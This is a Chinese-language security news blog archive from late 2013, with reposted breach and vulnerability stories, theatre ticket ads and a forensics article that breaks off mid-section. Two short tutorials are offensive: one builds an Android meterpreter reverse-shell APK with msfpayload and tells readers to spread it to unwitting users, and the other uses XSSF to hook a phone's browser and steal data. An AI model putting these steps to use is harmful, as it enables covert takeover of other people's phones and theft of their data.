2013年12月31日 星期二

退役倒數破百!Windows XP明年4月謝幕

退役倒數破百!Windows XP明年4月謝幕



還記得過去十二年來超過4,000個日子,日子有什麼改變嗎?2001年微軟發表Windows XP,當時全台灣的寬頻建置正在起飛,大家開始聚集在網路聊天室尋找同好朋友,眾多正妹從無名崛起,當時甚至連「宅男」這個詞都還沒出現。

2013年的今天,行動裝置的普及,享受美食之前要先拍照、打卡,透過臉書分享生活,還要用即時通訊App聯繫好友,透過網路的分享人與人之間的交流更加緊密,駭客卻也趁虛而入,連過去不會中毒的手機也無法倖免,病毒擴散速度倍增。

台灣微軟今(30)日表示,走過12年Windows XP,將在2014年4月8日光榮退役,帶著十多年的回憶和全球數十億使用者說再見。微軟提醒所有使用者,Windows XP終止支援服務的到期日進入倒數99天,盡早為電腦升級到至最新的Windows 8.1作業系統與Internet Explorer 11,保護資訊安全。回顧2001年上市的Windows XP,轉眼間已經陪伴全球數十億的用戶度過12個年頭;科技日新月異,不僅企業組織和其員工使用科技的方式因行動科技的崛起大幅改變,連病毒及駭客的攻擊手法也推陳出新。

2001年的電腦駭客,大多針對廣大的隨機對象,透過網頁竄改、簡單的拒絕服務攻擊,攻擊的目標只是讓電腦系統癱瘓,藉此證明個人能力,以讓自己名聲大噪。然而,時至今日,電腦駭客的身份已經轉化為受贊助的專業人士、組織團體,甚至是國家,利用分散式的拒絕服務攻擊、殭屍網路…等手法,竊取資料 (個資、信用卡資訊)、智財權以及各種機密文件,進而造成組織瓦解或透過黑市交易,以獲得數百萬美元的不法所得。

若企業認為自己的組織規模太小,不足以引起駭客興趣,很可能正好落入其陷阱。根據全球電信服務提供商Verizon所做的調查顯示,在資安大戰之中,沒有單位可以倖免,因為有75% 的電腦惡意攻擊是隨機性的,電腦駭客不會特別挑選對象,此外,高達78% 的企業資安保護不足,駭客只需要簡單的技術,甚至不用專業技能或資源就能入侵,導致公司機密或客戶個資外洩。

微軟的資安統計也顯示,2013年高達93% 的大型企業及87% 的中小企業遭受過安全方面的攻擊,隨著新個資法的上路,企業將可能因缺乏安全更新支援讓駭客有機可乘,導致個資外洩而需擔負未善盡保護之責的法律責任

Windows XP遭惡意程式感染的機會是Windows 8的21倍,Windows 7遭惡意程式感染的機會是Windows 8的6倍。微軟說,資安威脅防護的第一步,就是具備最新軟體、硬體和作業系統,因此,提供可協助降低和預防網路安全威脅的軟體解決方案一直是微軟優先考量的重點。

微軟從Windows 7到Windows 8.1投入大量資源強化資安技術,讓電腦開機、連網、資料保存到關機都擁有企業等級的安全防護。例如:安全開機和信任式開機、精進的資料防護功能、裝置加密、BitLocker硬碟加密…等創新的惡意程式防護與資料保護,以及如虛擬智慧卡、動態存取控制…等最新的存取控管。

Windows 8.1也為企業用戶帶來更多安全功能,包括:觸控式指紋生物識別、選擇式消除功能、所有Windows版本皆提供裝置加密,以及雲端惡意程式偵測服務等等。「新型的資安威脅不斷在演變,因此微軟在保護資訊安全上不曾鬆懈,連安全等級已經非常高的Windows 8,在上市後一年仍隨即推出多項安全更新和強化功能的Windows 8.1,微軟的目標是持續走在前頭,不讓威脅先馳得點。」

台灣微軟營運暨行銷事業群總經理康容表示,「對於企業用戶與消費者而言,持續使用沒有原廠支援服務的作業系統,僅僅單靠第三方防毒軟體是絕對不夠的,除了個資外洩所導致的損失之外,修復電腦及恢復資料所付出的維修時間與大筆費用更是得不償失。我們建議客戶盡快升級至最新Windows 8.1作業系統,不但能夠擁有微軟的支援服務,還可以符合員工對於現代工作模式的需求,妥善面對企業未來的挑戰。」

轉載自《NOWnews》

2013年12月29日 星期日

Synology DSM 多個目錄遍歷漏洞

Synology DSM 多個目錄遍歷漏洞

前幾天,Andrea Fabrizi 公布了 Synology DSM 的數個弱點,因 NAS 設備具有全天候服務、多人使用等特性,為避免影響正常線上服務,通常無 法立即更新韌體,義集思實驗室(AegisLab)特別準備了一台 Synology DSM 4.3-3810,錄製一段實際的攻擊結果,幫助大家了解此類設備的風險。


原始來源:AegisLab義集思安全實驗室
轉載自《網路攻防戰》

遠銀洩個資,聯徵中心重罰

遠銀洩個資,聯徵中心重罰

金管會進行金融檢查時,發現遠東銀行將客戶資料提供給合作車商,因而被聯徵中心重罰,停止遠銀的消金部門,向聯徵中心查詢客戶資料42天,這也是破紀錄的重罰,原因是遠銀洩露客戶資料已經是累犯。

遠東銀行將向聯徵中心調閱到的客戶信用資料,提供給合作車商,聯徵中心這回出重手,停止遠銀消金部門,向聯徵中心調查客戶信用資料42天,遠東銀行成為聯徵中心開罰最重的一家銀行。

遠東銀行低調地以新聞稿聲明,是經客戶同意簽名,將向聯徵中心調閱到的信用資料,提供給合作車商,並沒有違反「個資法」或「銀行法」,只是被聯徵中心認定違反聯徵中心的會員規約才會被罰。

因為遠銀3年內不只發生這一次,而被視為累犯,因此處罰比初犯5到30天還要重,為此,遠銀也將重新研擬車貸流程,避免再次被罰,到時,肯定會比42天還要長。


轉載自《民視新聞》

網購洩個資 花690元買包 被騙10萬

網購洩個資 花690元買包 被騙10萬



被稱為台灣網拍最大女包賣家的「PG美人網」,最近遭到詐騙集團鎖定行騙。刑事局昨天指出,十月迄今已有卅四位到該網購物的民眾報案,指稱接獲以帳務錯誤通知到提款機解除分期後遭騙,總損失金額逾百萬元,其中一人花了六百九十元買包,卻被騙了十萬多元。

家住新北市的陳小姐,平常有上網購物習慣,曾到PG美人網花了六百九十元買了一個包包,也拿到包包;但日前接獲業者來電,稱公司會計將其誤設為批發商,之後將有十二期的分期扣款,陳女當下曾懷疑自己是超商取貨付款,卻未再三查證。

歹徒隨即假冒合庫行員去電,表示其帳戶將每日扣款,要求陳女到提款機確認扣款情形,被害人即依指示操作轉出兩萬九千九百九十八元;歹徒又佯稱銀行系統每五分鐘會帳戶更新,要她把餘款全領出,以免被扣光。

手捧七萬兩千多元現金的陳女,未察覺提款機旁的警語,一心想把錢交給對方再回沖到自己帳戶,而原本幸運地過了銀行交易時間,她竟然還詢問對方,是否有補救辦法,對方眼見大魚上鉤,要她到超商買遊戲點數。

陳女買了十六張總值七萬兩千元的遊戲點數,並回報帳號密碼,但在確認帳戶時,才發現錢沒有回沖,驚覺被騙報警,損失十萬一千九百九十八元。

刑事局指出,盡管PG美人網已在公司首頁刊登小心詐騙警語,仍應積極加強網站防駭措施。因為依新的個人資料保護法規定,業者若未善盡保管交易資料責任,導致買家遭受詐騙損害時,買家可向賣家求償,被害人得請求法院依被害情節,每人每一事件五百元以上兩萬元以下,最高總額達台幣兩億元



轉載自《中國時報》

購物網個資疑外洩 上百民眾遭騙400萬元

購物網個資疑外洩 上百民眾遭騙400萬元


詐騙集團近來鎖定民眾喜愛在購物網站購物的習性,刑事局預防科統計,光12月上半月,在「PG美人網」「歐克團GO網」這2個購物網站共超過百名民眾遭詐騙,損失金額總計為452萬元,單筆被騙金額最高為25萬6千元,懷疑這2個購物網站客戶個資遭外洩。

警方指出,詐騙集團冒充客服人員告知民眾匯款操作錯誤,要求道ATM前改匯解除分期,民眾被騙對方又誘騙購1被害人買遊戲點數換回現金方式造成二次詐騙。

警方查出除上2網站外,包括「灰熊愛讀書」「五南網路書店」也都發生超過10起顧客被詐騙事件,刑事局預防科表示:「解除分期付款設定」「購買遊戲點數」都是常見詐騙手法,民眾接獲疑似詐騙電話時,可撥打165反詐騙諮詢專線查證。

轉載自《蘋果日報》

舉牌討債 洩個資判拘

舉牌討債 洩個資判拘

北市某裝潢公司張姓員工,不滿徐姓客戶未付裝潢費,竟背著看板,跑到對方住處樓下站崗,要他出面負責,因告示牌有全名和地址,徐男認為侵犯隱私提告。新北地院昨依違反個資法,判張拘役40日,得易科罰金4萬元,可上訴

法院審理時,張男辯稱,因裝潢糾紛,他多次聯絡徐男都未獲回應,只好將記載徐男姓名、住家、工地住址等資料,寫在告示牌上,並在徐男住處等候,僅是為了聯繫徐男不得已的手段,符合個資法規定。

轉載自《自由時報電子報

洩個資供追債 警被訴

洩個資供追債 警被訴


新北市警員楊健偉調任新店分局闊瀨派出所後,利用職務之便,私查上千筆民眾個資,並把其中上百筆資料洩漏給鄭姓當舖業者追債,也洩漏個資給認識的律師、逃犯。檢方痛批,被告身為警察,卻與討債集團勾結,淪為討債集團的尋人工具,請求法院從重量刑,另指出市警局應建立稽核制度,防止濫權。

檢警調查,原在板橋後埔所任職的楊健偉,民國101年6月23日被調往新店闊瀨所後,利用派出所內電腦及M-POLICE行動裝置,登入「內政部警政署警政知識聯網系統」,替朋友查個資。

檢警查出,楊男替住在樓下的鄭姓當舖業者調查上百筆債務人或債務人親屬的戶籍地等資料,以利追債;楊男還替先前曾委任的黃姓律師調查個人資料,以便訴訟進行,甚至替認識的靳姓逃犯,調查靳男是否遭到通緝。

楊員在偵查時坦承洩漏個資,但辯稱是幫朋友忙,檢方雖查無楊員收賄事證,但其洩漏個資明確,昨將他依法起訴。

轉載自《中時電子報

2013年12月27日 星期五

三星Galaxy S4被爆存在嚴重安全漏洞

三星Galaxy S4被爆存在嚴重安全漏洞

根據外媒報導,以色列Ben-Gurion大學網路安全研究室表示,他們的研究人員發現,三星電子(Samsung Electronics Co.)旗下最暢銷的智慧型手機Galaxy S4的安全平台,出現了一個嚴重的安全漏洞,惡意程式將可以透過該漏洞跟蹤電子郵件發送記錄、記錄通訊數據,甚至任意刪改數據資料等。

研究人員指出,他們是在日前意外發現該安全漏洞;而他們所指稱存在漏洞的,就是目前三星電子正在向美國國防部(Department of Defense)和其他政商企業積極推銷的新安全平台Knox。

研究人員發現,三星Galaxy S4的安全平台出現了一個嚴重的安全漏洞,惡意程式將可以透過該漏洞跟蹤電子郵件發送記錄、記錄通訊數據,甚至任意刪改數據資料等。圖:翻攝自網路Knox是三星視為可以與黑莓公司(BlackBerry Ltd.) 安全平台競爭的新武器。後者一向被肯定為注重客戶隱私的「黃金標準」。

Ben-Gurion大學的研究人員表示,他們認為三星Knox平台的安全漏洞,將使駭客可以「輕鬆攔截」使用此平台的Galaxy智慧型手機中的加密數據,而最糟的情況是,駭客可能還能夠任意修改數據資料,甚至在系統中嵌入惡意程式碼,從而能在安全防護的網絡內胡作非為。

該研究室的首席技術人員Duda Mimran在一份聲明中指出,新發現的漏洞代表了一種嚴重威脅的存在,受影響的人將包含所有使用此安全平台的終端設備用戶,例如三星Galaxy S4使用者。

Ben-Gurion大學的研究結果如果被證實為真,則此安全漏洞根據今年5月3日一份由美國國防部資訊系統局(Defense Information Systems Agency)審批三星Knox系統項目的文件,可被認定為達到最嚴重的「一級」安全漏洞。

三星公司隨後對安全漏洞的指稱發表回應,表示三星相當認真對待所有安全漏洞的提醒,也透露已經對問題進行初步調查;但發言人也強調,問題並沒有像以色列研究人員所宣稱的那麼嚴重,危險程度大約只相當於一些之前就已獲悉的駭客攻擊漏洞。

三星發言人進一步澄清,Ben-Gurion大學的研究人員對Knox系統的破解,似乎只針對一台未完整加載平台周邊其他軟體的手機所進行。發言人指出,核心的Knox架構無法被惡意程式入侵或破解,而企業用戶實際上也可以透過完整加裝所有協同Knox的軟體,來杜絕安全漏洞的問題。

美國國防部發言人皮卡特(Damien Pickart)表示,美國政府對可能的安全漏洞不予置評,只透露三星Knox安全系統尚未獲得批准在五角大廈的網絡上使用。但他也透露,國防部資訊系統局以及國家安全局(NSA)已經採購了500部Galaxy S4設備進行試點測試,但目前尚未正式進行部署。

日前美國國防部官員已表示,他們知道Knox平台存在部分安全漏洞,因此他們已經與三星合作修復那些漏洞;官員也透露,這種安全漏洞很常見,並且他們希望在測試過程中,可以繼續發現並修補潛在安全問題。

Knox並沒有預載於Galaxy S4設備上,不過任何用戶都可以自由下載該系統。而除了Galaxy S4,Galaxy Note 3出廠時已預載Knox系統,但Ben-Gurion大學的研究人員稱,他們目前只在載於Galaxy S4的Knox系統發現安全問題。

轉載自《新頭殼newtalk》

利用 Armitage 來遠端遙控 Android 手機

利用 Armitage 來遠端遙控 Android 手機

環境:
Kali Linux + Armitage

步驟:
1.使用關鍵語法產出 payload.apk
msfpayload android/meterpreter/reverse_tcp LHOST=本機 IP LPORT=8080 R> /root/Desktop/payload.apk

2.將該 apk 散播出去(本案例:放在 ubuntu 論壇上),使不知情的人安裝後在手機上開啟後門。

3.在 Armitage 上執行 use exploit/multi/handler 等待接收被開啟後門手機所傳來的遠端訊號。

4.接收到訊號後就可以遠端遙控取得該手機的檔案資料。

防範方式:
1.不要亂下載非官方 apk 檔。
2.開啟手機的防火牆機制(通常需要root)來防止惡意連線。
3.等官方修正 android 系統漏洞並更新修補程式。


轉載自《網路攻防戰》

利用 XSSF 來實現 android 4.1 手機網路釣魚手法

利用 XSSF 來實現 android 4.1 手機網路釣魚手法

XSSF( Cross-Site Scripting Framework )是一個檢測XSS漏洞的工具,其允許在目標裝置的 Google Chrome 瀏覽器上觸發一個XSS漏洞並依此建立一個後門連線( communication channel )。

XSSF 官方網站與軟體下載處:
https://code.google.com/p/xssf/

環境:
Kali Linux + Metasploit + XSSF (並使用SVN來進行版本更新)

步驟:
1.安裝好 XSSF 後 (放置於 Metasploit 的 apps/pro/msf3 中) 載入。
2.透過通訊APP或簡訊將 http://192.168.1.27:8888/test.html 於手機的 Google Chrome 瀏覽器中開啟就會觸發 XSS 。
3.於 XSSF 中輸入 _information 1 即可觀察到該手機的相關資料。
4.輸入 http://localhost:8999/gui.html?guipage=main 便可進行其它資料竊取的行為。

防範方式:
1.不要亂點選網址,尤其是經由簡訊或通訊APP。
2.開啟手機的防火牆機制(通常需要root)來防止惡意連線。
3.等官方修正 android 系統漏洞並更新修補程式。

 

轉載自《網路攻防戰》

2013年12月26日 星期四

開源Web應用防火牆(WAF)- ModSecurity v2.7發佈

開源Web應用防火牆(WAF)- ModSecurity v2.7發佈


ModSecurity是知名的開源web應用防火牆,它可以作為你的服務器基礎安全設施,是廣大站長的福音。目前支持Apache,IIS7和Nginx

【新版改進】
1.不需要對現有網絡進行調整,只需要分分鐘的時間將ModSecurity模塊加載進你的web服務器。
2.因為ModSecurity嵌入到你的web服務器中,所以他會很好的利用負載均衡的優勢。
3.在數據的處理中,ModSecurity的資源消耗很小。
4.許多IDS系統無法分析SSL加密流,但是ModSecurity對加密或壓縮內容毫無壓力。

下載網址:http://www.modsecurity.org/download/

2014全新古裝歌舞大戲《情人哏裡出西施》

2014全新古裝歌舞大戲《情人哏裡出西施》


2014全新古裝歌舞大戲
王偉忠+張大春+謝念祖 超強陣容再合體

顛覆歷史又一發,愛恨糾葛誰能招架 
沒想過的秘史四角戀,即將揭開面紗

在春秋末年紛亂的時局裡,英雄美人的故事俯拾皆是,但有一號美女你肯定認識,那就是西施,但也有一號醜女你肯定也認識,那就是東施。東施真的又醜又效顰?西施真的在范蠡的陪同下,進獻給吳王夫差?為何進獻之路走了三年才到吳國?最後又是誰跟著范蠡遠走高飛,誰隨逝去的吳王夫差自盡?這當中的糾葛究竟是一廂情願,還是兩情相悅,亦或是三角戀愛,更有甚者是四人關係?這當中是否暗藏了歷史都難以明說的曲折迂迴,又或是以假亂真、假情真愛、姐妹情深的驚人秘密?

若人各有命,你做的每個選擇是否還有意義?就讓我們,繼續看下去!

【注意事項】
◎本場次非親子節目,並涉及成人語言,年齡未滿12歲,身高未滿110公分之兒童請勿入場
◎退、換票最遲請於演出日前10天辦理,酌收票價10%手續費,逾期恕不受理
◎演出過程中禁止錄影、錄音及拍照
◎遲到觀眾須遵照主辦單位及館方指示入場
◎10/25(六)演出同步錄影

【購票優惠】
☆2013/12/25~2014/1/15止,早鳥購票7折優惠
*早鳥優惠超商無法提供,請至兩廳院售票端點或網路購票
*早鳥優惠不得與其他折扣合併使用
*票價:平日場$600及假日場$750票價均不適用此早鳥優惠方案
平日(週一~四):2800.2400.1700.1100.900.600
假日(週五~日):3000.2500.1900.1400.1000.750

身心障礙人士 享5折
(進場時請持票及有效證件,未帶證件或資格不符者須補票始得入場,陪同者限1人享有前項優惠)

瘋演第三回《瘋狂偶像劇》

瘋演第三回《瘋狂偶像劇》

瘋狂系列 經典再現 三度加演

金曲獎得主 
方文山 陳建騏 音樂加持

「那些年,我們一起追的女孩」 
九把刀 陳妍希 強力推薦 

監製:王偉忠、蘇麗媚
編導:謝念祖

不相信偶像劇卻做出一齣齣膾炙人口知名偶像劇的製作人劉志豪,在一次殺青慶功宴大醉酩酊後意外闖進「偶像劇」世界,遇到了這個世界標準的「女二」角色安琪,這個女孩正因又一次被男一拋棄而傷心難過,志豪心生憐憫決定運用自己多年打造偶像劇的經驗來幫助這女孩擺脫女二的命運,成為女一追求到自己的愛情與幸福。

偶像劇世界中不變的公式是什麼?安琪真的可以追求到一直以來得不到的愛情嗎?打破偶像劇公式的志豪將會讓這個世界發生什麼改變?請跟我們一起進入偶像劇的世界!

《非看不可四大理由》
1.繼瘋狂電視台後又一「嘲諷電視文化」力作
  討厭偶像劇的你會拍手叫好;
  喜歡偶像劇的你會感動涕零!
2.2012年2月首演13場,票房九成。首演後四個月,再次 攻占國家戲劇院二度加演。
3.周杰倫御用作詞「方文山」及五月天金獎編曲「陳建騏」聯手打造夢幻歌舞劇之作。
4.演藝圈逾40位知名藝人蒞臨觀賞,強力推薦。

【注意事項】
◎本場次非親子節目,並涉及成人語言,年齡未滿12歲,身高未滿110公分之兒童請勿入場
◎退、換票最遲請於演出日前10天辦理,酌收票價10%手續費,逾期恕不受理
◎演出過程中禁止錄影、錄音及拍照
◎遲到觀眾須遵照主辦單位及館方指示入場
◎演出現場(國父紀念館)恕不提供取票服務,請網路購票觀眾,儘早於售票端點或超商取票,以免影響入場

【購票優惠】
☆2013/12/25~2014/1/15止,早鳥購票7折優惠
*早鳥優惠超商無法提供,請至兩廳院售票端點或網路購票
*$500及$750票價均不予任何折扣及優惠
*早鳥優惠不得與其他折扣合併使用

身心障礙人士 享5折
(進場時請持票及有效證件,未帶證件或資格不符者須補票始得入場,陪同者限1人享有前項優惠)

瘋演第八回《瘋狂電視台》

瘋演第八回《瘋狂電視台》


全球首創 把劇場搞成攝影棚! 
瘋狂系列 經典再現 台北城八度加演
三年演出達125場,超過13萬人捧腹大笑

監製:王偉忠
編導:謝念祖
主演:從從、吳世偉、王鏡冠、茵菌
   阿迪(黃迪揚)、神祕嘉賓(?)

僅剩下二名員工的瘋狂電視台,要如何運用僅剩的資源在這麼艱困的媒體環境中殺出一條血路?且看用相聲播報眾家新聞!最真實的Live生存遊戲戰!全宇宙唯一說真話的兒童節目是什麼樣子?還有你從沒看過,最精采的政論摔角秀!睡不著嗎?瘋狂電視台推出「深夜助眠秀」單元陪伴您進入夢鄉…

看戲的您不只是觀眾而已!您不僅有機會上來參觀瘋狂電視台,還可以擔任劇中的臨時演員!瘋狂電視台隆重推出讓全場同歡、現場觀眾同樂的類戲劇演出!意想不到的互動方式,常常看戲的朋友們有全新的體驗,沒看過舞台劇的朋友大呼過癮!

《非看不可六大理由》
1.世界首創結合劇場與攝影棚的表演形式。
2.國內演出達77場,對岸演出達48場,創下劇場史創團作最短時間演出超過百場。
 累積進場觀賞人數破13萬。
3.首屆上海壹戲劇大賞最佳製作人獎,同時入圍最佳導演。
4.首部加入慶祝建國百年內容之舞台劇團。
5.史無前例將表演內容結合服務業、公司品牌、求婚,無所不能置入服務。
6.觀眾超高互動性,平均每場台上15名,台下上千名觀眾演出。

【注意事項】
◎本場次非親子節目,並涉及成人語言,年齡未滿12歲,身高未滿110公分之兒童請勿入場
◎退、換票最遲請於演出日前10天辦理,酌收票價10%手續費,逾期恕不受理
◎演出過程中禁止錄影、錄音及拍照
◎遲到觀眾須遵照主辦單位及館方指示入場

【購票優惠】
☆2013/12/25~2014/1/15止,早鳥購票7折優惠
*早鳥優惠超商無法提供,請至兩廳院售票端點或網路購票
*早鳥優惠不得與其他折扣合併使用
*票價:平日場$600及假日場$750票價均不適用此早鳥優惠方案
平日(週一~四):2800.2400.1700.1100.900.600
假日(週五~日):3000.2500.1900.1400.1000.750

身心障礙人士 享5折
(進場時請持票及有效證件,未帶證件或資格不符者須補票始得入場,陪同者限1人享有前項優惠)

《當岳母刺字時…媳婦是不贊成的! 》

《當岳母刺字時…媳婦是不贊成的! 》



張大春+謝念祖+王偉忠+方芳+郎祖筠 
五位大咖 重砲出擊 

歷史系列 經典再現 火辣六度加演
兩年演出達46場,超過7萬人感動推薦

2013代表台北前往廣洲,兩岸城市藝術節開幕大戲

監製:張大春.王偉忠
編導:謝念祖
主演:方 芳、郎祖筠、盛 鑑、陳子強
   陳家逵、吳佩凌、黃依婷、呂家君

你可知道南宋抗金英雄岳飛忠勇的背後有什麼力量支持他?岳母刺字時發生了什麼事?南宋的科技發明獨步全球,當時就有益智遊戲《飛鳥撞婆婆》!而所有男人發明創意、前線奮勇殺敵最終的原因都是因為…家中有婆媳!

全民大劇團顛覆歷史,要讓您看看這一段不為人知的「祕」史。

【注意事項】
◎本場次非親子節目,並涉及成人語言,年齡未滿12歲,身高未滿110公分之兒童請勿入場
◎退、換票最遲請於演出日前10天辦理,酌收票價10%手續費,逾期恕不受理
◎演出過程中禁止錄影、錄音及拍照
◎遲到觀眾須遵照主辦單位及館方指示入場

【購票優惠】
☆2013/12/25~2014/1/15止,早鳥購票7折優惠
*早鳥優惠超商無法提供,請至兩廳院售票端點或網路購票
*早鳥優惠不得與其他折扣合併使用
*票價:平日場$600及假日場$750票價均不適用此早鳥優惠方案
平日(週一~四):2800.2400.1700.1100.900.600
假日(週五~日):3000.2500.1900.1400.1000.750

身心障礙人士 享5折
(進場時請持票及有效證件,未帶證件或資格不符者須補票始得入場,陪同者限1人享有前項優惠)

2013年12月20日 星期五

美零售商Target刷卡機遭駭 4,000萬筆信用卡資料外流

美零售商Target刷卡機遭駭 4,000萬筆信用卡資料外流


全美第2大折扣零售商Target證實,該公司高達4,000萬筆信用卡與簽帳卡資料,於11月27日至12月15日間遭竊。

針對零售商於週四隨後的聲明報導指出,竊賊在黑色星期五週末期間,透過該零售商店內已遭篡改變造的刷卡機,成功獲取儲存在信用卡與簽帳卡背後磁條中的資料。

根據報導指出,該資料可被用來製作在ATM提領現金的偽卡。

遭劫持的卡片資訊可能包括用戶名稱、信用卡或簽帳卡號、卡片到期日,以及3個數字的CVV(Card Verification Value)安全碼,Target於公告中指出。至於在其線上商店Target.com或美國之外實體商店的顧客,則不受影響,該公司補充說明。

Target表示,該公司正與執法部門與金融機構緊密合作,已確認出問題並加以解決,並表示其正與外部鑑識公司合作。

凡懷疑有任何未授權不法之舉的顧客,可逕與該公司連繫,Target表示。

安全新聞作家Brian Krebs於週三報導指出,起初以為該攻擊是從2013年感恩節開始,直到12月6日為止。但就調查人員所發現的新事證指出,該攻擊可能拖到12月15日才結束,這也已獲得Target的證實。

該起入侵事件據信有高達4萬台刷卡機受到影響,恐造成數百萬持卡人帳號有招致攻擊風險,華爾街日報引述熟知相關內情的人士指出。同時,兩個來自前10大信用卡發卡機構透露消息給Krebs,表示該攻擊事件對Target在美國幾乎所有的銷售點都造成了影響。

資料來源:PCWorld
轉載自《網路資訊雜誌》

復原iPhone備份記錄檔 鑑識Facebook跡證

智慧型手機瘋臉書 社群網站應用易遭濫用
復原iPhone備份記錄檔 鑑識Facebook跡證

本文以iPhone探討使用者對社群網站應用程式的操作,及萃取出可能的存留數位證據,並透過案例說明在iPhone上Facebook的可能非法活動,這些活動的存留證據可利用手機鑑識技術進行資料回復,以協助釐清真相,還原現場。

近幾年,社群網站迅速崛起,它們提供使用者一個可以進行溝通、建立社團、分享各種資訊和想法、對其他訊息進行評論、上傳檔案和相片、參加活動及進行即時訊息溝通和網路通話的平台。研究顯示,在2012年底世界上網路使用人數大約已有2.4億人,而每個月在Facebook上活動的人數就超過1億人,Twitter也有200萬人。

社群網站原始目的主要用於溝通及與朋友交往,但各式各樣的社群網站和網路匿名性使得它們成為非法者進行不法行為的溫床。非法行為者如詐騙、戀童等,都可能以假造身分進行社群網路使用註冊。

社群網站也讓人們習慣將個人資料如年齡、性別、興趣和行程安排等公開,使得網路非法者得以利用他們的專長取得這些資訊,並用這些非法取得的資訊進行非法行為。

透過社群網站,大量的非法行為也隨之出現,數位鑑識的重要性也跟著提高。因此,取得非法者電腦中的社群網站活動數位證據,對於調查非法行為有很大的幫助。

除了透過電腦登入社群網站外,使用者也可以利用智慧型手機進行登入、張貼新文章、更新訊息、打卡等等服務。透過智慧型手機或其他可攜式裝置,使用者可在任何時間、地點更新個人資料,但這些方便的功能可能也隱藏了風險,像是打卡的功能會暴露個人目前的所在位置以及旁邊有誰,有心人士就可藉機進行闖空門或是擄人勒贖等違法情事。

根據Facebook官方調查,使用智慧型手機的使用者的活躍程度是那些不透過智慧型手機登入Facebook使用者的兩倍。因此,當在非法者的智慧型手機上進行鑑識調查時,對於尋找數位證據十分有幫助。

相關背景

智慧型手機的使用率越來越高,相對地帶動整個社群網站的使用程度,使用者對智慧型手機及社群軟體的依賴日漸加深,因此獲取手機裡的數位證據將會是數位鑑識的一個新方向。智慧型手機等可攜式裝置內的資料,可以拿來證明非法者的行為、犯罪動機以及其與共犯的相關性,讓相關案件得有跡證可抽絲剝繭。

可攜式裝置之鑑識 

所謂的可攜置裝置,指的是包含手機、平板等攜帶方便的裝置,裡面可能儲存了多媒體、私人活動、社交關係等資訊。以往相關的研究一直專注於智慧型手機的採證技術與一般的鑑識分析。而近幾年來的研究,則概述了手機所使用的技術、處理程序和常見的證據儲存位置。

一般來說,這些資料都可以從手機的內部記憶體中進行萃取,例如通話紀錄、簡訊、電子郵件、照片等,希望能從中得知提取每個手機的內部記憶體資料的方法。

iPhone內的資料可以透過物理或邏輯的方法進行萃取,不過物理萃取通常需要將系統進行越獄,使得系統的資料經過輕微的修改。Android智慧型手機也可透過物理或邏輯的方法進行萃取,但通常必須經過root程序才能獲得完整的資料。

社群網站鑑識 

社群網站提供了使用者一個可以進行溝通、建立社團、分享各種資訊和想法、對其他訊息進行評論、上傳檔案和相片、參加活動及進行即時訊息溝通和網路通話的平台。以往的使用都是透過電腦,但由於現今許多社群網站應用程式都已經整合進智慧型手機等可攜式裝置,對於智慧型手機和可攜式裝置的鑑識重要性便與日俱增。

一般而言,鑑證人員可能在非法者的智慧型手機找到相關證據。智慧型手機儲存的資料往往可以協助確認該設備如何被使用者使用。因此,透過社群網站的應用程式所進行的活動可能儲存在智慧型手機內。

不過,之前的研究都一直侷限在社群網站應用程式的基本資訊復原。在本文則將側重於有關社群網站應用程式的資訊復原,透過活動的執行來確定這些應用程式的資料是儲存在智慧型手機中,並且可以加以萃取成為證據。

智慧型手機系統

目前最常見的智慧型手機系統非Android、iOS莫屬,另外還有曾經紅極一時的BlackBerry,以下分別加以介紹。

Android 
Android OS是以Linux為底層基礎開發的作業系統,後來被Google所併購,目前可說是iOS最強勁的競爭對手之一,也是目前世界上市占率最高的智慧型手機作業系統。

Android在早期時是由Google所獨立開發,後來則由開放手機聯盟(Open Handset Alliance)進行聯合開發,它採用軟體堆層的架構。Android最大的特色便是開放原始碼,也就是說它的SDK是開放給任何的開發人員,因此所有開發人員都可以按照其想法自行開發介面,著名的大陸小米機就是其中的代表。

iOS 
iOS為Apple公司為iPhone所開發的作業系統,使用該系統的設備包括iPhone、iPod touch以及iPad。iPhone最著名的特色之一便是直觀且簡便的觸控式用戶介面,iOS使用者的介面概念基礎是能夠使用多點觸控直接操作。該螢幕的下方的圓形Home按鍵是其特色,底部則是有使用者最經常使用的四個程式的圖示被固定在上面。

其方便且調校良好的系統以及流線時尚的設計,至今仍是大受年輕人歡迎。通過審核的第三方應用程式都可以透過Apple的App Store進行發布與下載,但也因為iOS的封閉系統策略,使得核心系統的功能受到諸多限制。

BlackBerry 
黑莓機(BlackBerry)是由加拿大Research In Motion(RIM)公司所開發,其特色除了一般手機所具備的功能如通訊、上網、傳簡訊、影音播放外,還主打Push Mail(自動將電子郵件傳送到手機中,在早期算是十分新潮的功能)以及BBM(黑莓機獨有的即時通訊程式,可以在黑莓機間互傳訊息,在最新的版本中還加入了視訊對話的功能)。

其他的功能如電話簿、行事曆也一應俱全。此外,其專門配備的QWERTY鍵盤十分受到使用者的喜愛,非常適合行動商務人士使用。

黑莓機使用者能夠迅速且安全地將一些重要的資料與訊息傳輸到接受者的黑莓機上,讓客戶得以隨時掌握到資訊。更因為其通話、網路、訊息皆經過高度加密處理,因此其安全性十分有保障,大受政商人士及企業用戶的喜愛。

社群網路應用程式 

現今最流行的社群網路應用程式當屬Facebook,而Twitter、Plurk也非常受到歡迎。

Facebook 
Facebook是一個提供社交網路服務的網站。Facebook的創辦人是Mark Zuckerberg,該網站於2004年2月4日正式開始運作。基本上,使用者想要加入都是免費的(但也有部分功能需要收費,像是擴增好友最大數量)。

使用者可建立自己的個人頁面,裡面包括照片和個人興趣等,使用者也可以彼此進行公開或私下留言,還可以加入其他朋友所建立的社團。使用者詳細的個人資料只有同一個學校或公司的用戶或是已被認證的朋友才可以觀看,除非使用者將其資料設定為公開。

Twitter 
Twitter建立於2006年,由Evan Williams所創立,它是一個兼具社交功能及微網誌服務性質的網站,使用者可以將自己的最新消息動態和各種想法以短短幾個字傳送到手機和其個人專頁,讓其他朋友能夠得到其最新的消息。

Twitter的特色是允許使用者發布短消息給其朋友或其他Followers(粉絲),如果使用者想輕易地讀取特定人士所發布的消息,也可以透過指定想跟隨的Twitter使用者達成目的。

Twitter一開始是希望能在手機上使用,且能跟電腦一樣的容易使用,因此才會有字元數量需在140個之內的限制;如此一來,每條短消息都可以使用SMS(Short Messages)簡訊發送。如果使用者怕自己所發的資料被特定人士看見,則可以設定權限,唯有當朋友獲得使用者的允許才能查看。

Plurk 
